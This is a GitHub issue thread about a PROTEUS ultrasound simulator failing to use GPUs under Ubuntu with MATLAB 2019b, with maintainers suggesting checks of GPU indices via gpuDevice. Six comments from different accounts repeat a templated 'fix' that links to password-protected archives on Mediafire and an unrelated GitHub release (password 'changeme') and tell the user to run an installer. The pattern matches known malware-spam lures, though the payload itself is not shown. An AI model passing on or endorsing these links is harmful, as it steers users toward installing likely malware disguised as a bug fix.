### ISSUE TITLE
GPU cannot be used in Ubuntu and MATLAB 2019b

### ISSUE THREAD

**Issue by renxwang** [PROTEUS-SIM/PROTEUS#2]
I got a problem when I would like to simulate using GPU in Ubuntu and MATLAB 2019b.
![image](https://github.com/user-attachments/assets/48b8aa47-30d8-4fc0-9892-2fd59a26c1be)

It works if I only use CPU so it is not because of the problem of k-wave 1.3.
I think this problem is due to the MATLAB version and the h5read function. The simulator can also work with GPU on Windows10 and MATLAB 2021a. I tried to copy h5read function from MATLAB 2021a but it still have the above problem.

Should I have to upgrade my MATLAB version?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by GLajoinie** [comment]
Dear Renxwang,
As a preliminary check, I see you are trying to use the third GPU (CUDA ID=2). Are there indeed 3 available GPUs in your machine? It appear the code cannot acces it.

**Comment by renxwang** [comment]
> Dear Renxwang, As a preliminary check, I see you are trying to use the third GPU (CUDA ID=2). Are there indeed 3 available GPUs in your machine? It appear the code cannot acces it.

Yes, there are 3 GPUs. All the GPUs have the same problems by running in the command line.
![image](https://github.com/user-attachments/assets/0f2c9c1a-59d2-438e-9630-00140279b69e)

If I run by GUI, same error will happen.
![image](https://github.com/user-attachments/assets/63d4570a-5f79-4674-a719-aea58f621c31)

I think I have to reinstall matlab with a newer version.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NathanBlanken** [comment]
Can you check if you can access the GPUs directly from the MATLAB command line by entering `gpuDevice(IDX)`?

```
D = gpuDevice(IDX) selects the GPU device by index IDX. IDX must be between
    1 and GPUDEVICECOUNT. An error may occur if the GPU device is not supported
    for use. Note that selecting a device, even if it is already selected,
    resets that device and invalidates any existing gpuArrays and CUDAKernels.
 ```
Note that MATLAB counts the GPUs starting from 1, unlike PROTEUS, k-Wave, or Linux systems, which start counting from 0.

I don't think the MATLAB version is necessarily an issue. We have used the same MATLAB version (2019b) for a major part of the development of PROTEUS and we have never encountered this issue.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
